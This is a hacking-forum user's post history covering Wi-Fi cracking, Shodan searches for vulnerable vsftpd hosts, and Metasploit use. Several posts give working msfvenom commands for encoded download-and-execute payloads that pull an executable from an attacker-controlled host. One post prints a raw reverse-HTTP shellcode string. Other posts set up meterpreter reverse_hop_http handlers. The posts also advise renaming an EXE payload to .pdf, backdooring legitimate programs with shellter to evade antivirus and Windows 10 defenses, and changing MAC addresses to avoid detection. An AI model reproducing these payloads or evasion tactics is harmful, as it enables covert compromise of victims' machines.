vailixi
-
Posts
377 -
Joined
-
Last visited
-
Days Won
3
Posts posted by vailixi
-
-
How do I force the use of IPv4 addresses on my local area network vs IPv6?
-
Pentesting tools can be quite loud as generally speaking if someone is paying you to test their network/site they know you are coming. If you are doing things passively, like sniffing for the handshake and cracking it offline then you are safe. I've always found the field of anti-forensic interesting too.
I tend to agree here. If you are not actually running any attacks you are less likely to be detected. Is there a way to check for monitor mode devices? Are they actually sending anything or communicating at all? I know airodump will show probes and such from non-associated clients but is there a way to detect a monitor mode device?
I know you can filter for deauthentication frames in wireshark. Changing your mac address is a must if you are actively penetrating.
-
There are some 64 bit encoders.
I've read through MSFU a few times now. I always seem to pick up something new. -
dd@dd:~$ shodan download --limit 1000 vsftpd "vsftpd 2.3.4" Search query: vsftpd 2.3.4 Total number of results: 2102 Query credits left: 0 Output file: vsftpd.json.gz [####################################] 100% Notice: fewer results were saved than requested Saved 100 results into file vsftpd.json.gz
Gets to 10% and quits at 100 results every time whether the --limit 1000 flag is used or not. ":)"
Thanks for your time achillean. I'm sure you're a busy guy.
-
Sounds like a matter of
:dump access point information to a csv file
read the access point data from the csv file into a temp file
loop through the access points and run wifite in WPS mode against each access point. I'm sure there's a way to 'listen' for new entries into the file. Not sure how that works. But you pretty much can attack each new access point as it comes into range.
Someone posted a ruby script for this a bit ago. It was much simpler than this one. https://forums.hak5.org/index.php?/topic/34617-how-to-reaver-dropbox-raspberry-pi/?hl=%2Breaver+%2Bruby
I hope that helps a little bit.
Edit ^ or just what Cooper suggests. He's pretty much right all of the time.
-
So lately I've been checking out shodan.io and finding some interesting stuff. What I noticed is by default the CLI won't display more than 100 results at a times. What I got the from the dev was that it displays 100 results per page but you could loop through the pages and display as many results as you want to but you have to tell it where to end so you don't burn up all of your credits.
I'm really not sure how to loop through the pages and display more than 100 results. Anybody have any experience with this?
-
I was trying a bunch of ways to download and run programs then I was like ok there's a metasploit payload that does it. But it doesn't seem to want to work. I generated it with msfvenom a couple of different ways.
First I tried generating some hex to add to my python script to use as a payload with a remote exploit. Didn't work though. Here's the exploit for reference https://www.exploit-db.com/exploits/39008/
msfvenom -p windows/download_exec -e x86/shikata_ga_nai -i 3 -b '\x00' '\x20' '\x2f' '\x5c' --smallest --platform win -a x86 EXE=rocker.exe EXITFUNC=process URL=http://192.168.0.184/rocker.exe -f python -o /root/Desktop/down_exec.python
Then I decided to create an exe and run and just try to run that on the target machine it's just doesn't seem to be working. I'm not sure what I'm doing wrong here.
msfvenom -p windows/download_exec -e x86/shikata_ga_nai -i 3 -b '\x00' '\x20' '\x2f' '\x5c' --smallest --platform win -a x86 EXE=rocker.exe EXITFUNC=process URL=http://192.168.0.184/rocker.exe -f exe -o /root/Desktop/down_exec.exe
Not really sure what I'm doing wrong here.
-
If know the ESSID for the access point you will be testing you can always generate a precomputed table. If you have a system with a decent sized CPU you can create all of PMKs ahead of time. It's still going to take the computation time initially but once it's done you are golden. One of the benefits to the precomputed table is if they change the password you might still have the password in your table. The only way to secure your access point against this kind of attack is to change the ESSID. But I think you can do this with the BSSID as well so you gotta change the MAC address. The point is if you make the rainbow table you're likely to get back in when the password has been changed. Of course there's always find an OPN access, one that is vuln to Pixiedust attack, Or a WEP protected access point. But really go for the lowest hanging fruit. That is, unless you really need to hit a specific access point and that is the only way you can gain access to the network. But it's probably not the only way in.
-
I was having firewall issues.
I remembered seeing problem like this addressed in a segment of Metasploit Minute
I wanted to try windows/meterpreter/reverse_hop_http
I set the payload to talk to hop.php that I installed on my local machine. That part I'm pretty sure works. I'm not sure what options I didn't set right for the handler but it's wanting to stage to example.com rather than the IP I set. I know I'm missing an option but I'm not sure where to set it.Edit: No idea what I was thinking there.
use exploit/multi/handler set HOPURL http://192.168.0.184/hop.php set payload windows/meterpreter/reverse_hop_http exploit -j
Second try. Nailed it.
-
Few things. Are they services? (check in services.msc). one process starting another, sounds more like dependencies in a service, which can restart themselves. AS cooper mentioned, only one process is the parent, but more than likely another process you don't see started it.
Check out process explorer from the msft sysinternals stuff. It will show you all processes, and a tree like structure under them which are the child prcoesses. It also lets you close them like task manager, but often works better than task manager when you get hung programs that won't let you kill them. Just right click and run as administrator first. Some services won't let you kill them eaisly, but can be shutdown in services.msc,and for those that don't show there, from the command line(run as admin first) with "net stop servicename". you can also do "sc query" to see all running services.
Thanks. Yeah I was looking at processes and not services. I will try stopping services.
-
Is there something like arwin but for later versions of Windows. I'm need to find memory addresses for system stuff.
-
I have a couple of processes running on Windows that just won't die. I figured out something kinda cool you can use the /t and /f switches and sometimes but not always it will kill child processes. So sometimes you can't kill a process directly but you can force kill the parent process and that will kill the child process even if the parent process comes back access denied. I thought this was pretty novel.
So I want to kill two processes but they are both the parent and child process of each other. How do I kill them. If I can't do it from command line is there a .NET function that I can use with VB, C#, or VC++? -
You could use it to crack unsalted sha256. Or mine another cryptocurrency that uses sha256 for future investment.
-
I hadn't noticed that thread before. Lots of excellent resources.
-
You don't need an exploit. Create your obfuscated payload. msfvenom alone isn't going to do it. But there are tools in Kali for handling this. Output your payload to an EXE file. Then simply right click on it and change the name of it to whatever.pdf. That's pretty much it.
-
I don't really understand assembly code but I'm trying to learn it. I was curious is there a way to dump any old binary into a format that I can deliver via metasploit. I haven't really looked at the mechanics of payload delivery but I'm assuming payloads are delivered in a format like this:
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368901f0000e8080100002f586f525f762d445a35485978345444675a37325779417636395562494b706a42506338623968496e516e7861374c515566425465567a4557415a776150506d6d4f6f316c58626e70436573454e67433939596d364853424c335058754a4f3468714c477374656f4468696c79784d53687557393363534346754e622d4249696b38756d00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c075084f75d9e84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe877ffffff3139322e3136382e302e31383400bbf0b5a2566a0053ffd5
I suppose my question is: How do I go from a binary to this hex format. Is there an easy way to dump the binary into a ready to use assembly instruction set? If so what are the steps? If there's not an easy mode way to do this hypothetically what are the steps. Is it as simple as dumping the bytes into an array and outputing them that way.
Can I take the output of objdump, hexdump, or xxd and create this usable byte array or string or whatever. I'm just really not sure where to start. -
Execllent bored369.
-
This article caught my eye a few weeks ago. I read through it but I didn't really understand it fully. Don't have time to go over all of this stuff.
http://stegosploit.info/ -
Introduce yourself in the thread titled introduce yourself. https://forums.hak5.org/index.php?/topic/4434-introduce-yourself/
-
I wonder what the software support for this is like.
-
I'm going to give you the best bit of advice on linux programs. Most command line programs will have will a --help or -h option that will tell you usage for the program.
arg0, arg1, arg2, etc
command, first argument, second, etc
There's also usually a man page for each installed program.
man <command>
There's also documentation for most programs most of them will have a website or at least a google code or github with at least a readme file. Other programs will have more extensive documentation.
Probably at this level you are not even sure what to look up so reading that documentation is going to give you the vocabulary you need to actually search for the solution to your problem. Troubleshooting isn't knowing a fix for every problem off of the top of your head. It's being able to deduce what you need to look up. Not even deducing the solution but being able to know what to look up so you can find the solution. So yeah reading the documentation. If you on't like reading and looking stuff up a lot hacking is probably not for you.
lspci lsusb ifconfig iwcofig etc etcMaybe simply
ifconfigthe look at the interfaces, usually you have ethernet, wireless, and a loopback interface
So something like lo, eth0, and wlan0 or something to that effect
wlan0 or ath0 or something like that is the one you want
then run wifite -i <wireless interface>
where wireless interface is your wireless device
eiwifite -i wlan0
Also check out the options for mac randomization and things like that to keep yourself out of trouble. -
If you're a newb I would suggest catching up on the hak5 YouTube channel. I mean watch all of the videos. Learn a little bit. Come back and ask specific questions about specific technologies and specific aspects of security.
And admit it. This is your homework.
-
I'm doing a custom build with long instructions and it says copy a certain batch file and paste it into the start menu. But it's not working. It's not like with Windows 7 where you can just drag and drop. I'm not sure where the start menu folder is. Can anybody help me here?
What is the location of the start menu folder in Windows 10?
-
Is there a finfisher removal tool for LInux?
metasploit and windows 10
in Security
Posted · Edited by vailixi
This is stupid question. But do you have port 8080 open on the Windows 10 machine?
If you want to test your payload to see if it works. Test it without the firewall first.
I had problems about a month ago trying to shell a Windows 10 box and here's some stuff I figured out. Windows 10 has some security features that are not available in previous version of Windows. I'm not sure how it all works. Windows is will notice that your payload is trying to hook into other system processes or DLLs on the windows system. But if inject your payload into the execution flow of an legitimate application it will run just fine and Windows isn't going to notice anything fishy.
Here's something else you can do. Use a reverse_hop_http meterpreter
You can output it to whatever format you think will work. I noticed my payloads were getting flagged by security essentials and other anti-virus programs so I decided I would backdoor a legitimate executable. I did that with a program called shellter. Worked like a charm.
Keep in mind that shellter will not work with all binaries and also doesn't work every time. Sometimes you will have try backdooring the exe several time before it's successful. Shellter does a lot of stuff that is at this point technically beyond me. But you can read about it on the website. https://www.shellterproject.com/
Payload is build make available for download. Don't forget to move hop.php to your /var/www/html/ folder and start apache.
Once the binary is ran on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.
The great thing about this is once you build a payload like this it will work on Windows 7 or XP as well.
Also I think there's a way to bind meterpreter to edge or internet explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.